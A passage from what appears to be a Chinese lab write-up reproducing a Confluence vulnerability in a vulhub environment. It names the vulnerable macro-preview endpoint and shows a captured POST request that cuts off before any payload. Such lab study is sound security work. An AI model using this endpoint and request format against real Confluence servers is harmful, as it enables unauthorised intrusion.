说明:
1、文章环境通过vulhub搭建
2、此文无代码调试环节
抓包
搭建完成 confluence环境后,进入编辑页面。通过插入处添加更多 宏。选择任意一个,burp抓包可以看到漏洞相关的接口:/rest/tinymce/1/macro/preview
请求包:
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: IP:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36-black-box-scan
Content-Length: 168
Accept: */*
Content-Type: application/json
Cookie: JSESSIONID=8962F5E8D4F037780C041055048D78CD
Referer: http://10.200.195.179:8090/pages/editpage.action?pageId=98373
Accept-Encoding: gzip
{
"contentId":"786458","macro":{
"name"